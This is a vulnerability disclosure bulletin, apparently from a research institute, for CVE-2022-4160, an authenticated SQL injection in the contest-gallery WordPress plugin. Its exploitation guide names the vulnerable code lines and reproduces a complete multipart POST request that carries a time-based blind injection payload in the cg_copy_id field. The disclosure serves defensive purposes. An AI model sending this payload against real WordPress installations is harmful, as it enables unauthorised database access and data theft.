Security Bulletin
of the Fraunhofer IESE Research Institute
Home
/
contest-gallery 19.1.4.1 (14/15) WordPress plug-in SQL injection

contest-gallery 19.1.4.1 (14/15) WordPress plug-in SQL injection

Vulnerability Metadata

Key Value
Date of Disclosure December 05 2022
Affected Software contest-gallery
Affected Software Type WordPress plugin
Version 19.1.4.1
Weakness SQL Injection
CWE ID CWE-89
CVE ID CVE-2022-4160
CVSS 3.x Base Score n/a
CVSS 2.0 Base Score n/a
Reporter Kunal Sharma, Daniel Krohmer
Reporter Contact k_sharma19@informatik.uni-kl.de
Link to Affected Software https://wordpress.org/plugins/contest-gallery/
Link to Vulnerability DB https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4160

Vulnerability Description

The cg_copy_id MULTIPART POST query parameter in contest-gallery 19.1.4.1 is vulnerable to SQL Injection. An attacker with role of Author or above may abuse the Copy Gallery functionality in cg-copy-comments.php and cg-copy-rating.php. This leads to a threat actor crafting malicious POST request.

Exploitation Guide

Note: In some cases, the line number mentioned in description text above the image can be different from the image shown below it. This change is due to lines of code wrapping, which is done to represent long lines of code in the image. The description text represents the actual line number in the application.

Create a New Gallery, if no gallery was created before.

contest-gallery_14_step-1.png

Change the Gallery name.

contest-gallery_14_step-2.png

contest-gallery_14_step-3.png

Click on Edit gallery.

contest-gallery_14_step-4.png

Select third option and click Copy.

contest-gallery_14_step-5.png

Clicking Copy triggers the vulnerable request.

contest-gallery_14_step-6.png

contest-gallery_14_step-7.png

A POC may look like the following request:

contest-gallery_14_step-8.png

In the application code, the vulnerability is triggered by un-sanitized user input of cg_copy_id at line 3 in ./v10/v10-admin/copy-gallery.php.

contest-gallery_14_step-9.png

Subsequently, function call is made on variable $idToCopy . contest-gallery_14_step-10.png

contest-gallery_14_step-4.png

contest-gallery_14_step-10.png

At line 39 in ./functions/general/sql/cg-copy-comments.php database query call on $oldGalleryID leads to SQL Injection.

contest-gallery_14_step-10.png

Furthermore, At line 46 in ./functions/general/sql/cg-copy-rating.php another database query call on $oldGalleryID leads to SQL Injection.

contest-gallery_14_step-11.png

Exploit Payload

Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.

The SQL injection can be triggered by sending the request below:

POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&edit_gallery=true HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------57928068830176656773670049687
Content-Length: 1508
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668734427%7CUHijoj82qZ3zggyrkh30RBG6N1IDmWR8ZDV3fZNzCre%7C6333e4fa1fc3f8961218830b63c9910e36a1507d9530ee857dda65208e7bd3bf; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668734427%7CUHijoj82qZ3zggyrkh30RBG6N1IDmWR8ZDV3fZNzCre%7Cd34e5c9317c939593831376a9467f195ca7e97151d2f965acdbc84aeb291c5b7; wp-settings-time-5=1668467252; wp-settings-5=libraryContent%3Dbrowse
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy_type"

cg_copy_type_all
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy"

true
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy_id"

1 AND (SELECT 7394 FROM (SELECT(SLEEP(2)))UrUZ)
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cg_copy_start"

0
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="option_id_next_gallery"

0
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="id_to_copy"

1
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="edit_gallery_hidden_post"


-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="copy_v7"

true
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="page"

contest-gallery/index.php
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="action"

post_contest_gallery_action_ajax
-----------------------------57928068830176656773670049687
Content-Disposition: form-data; name="cgBackendHash"

e12e8782da8ac6c4f1725d81a9811524
-----------------------------57928068830176656773670049687--
© 2022 IESE
Imprint
Data protection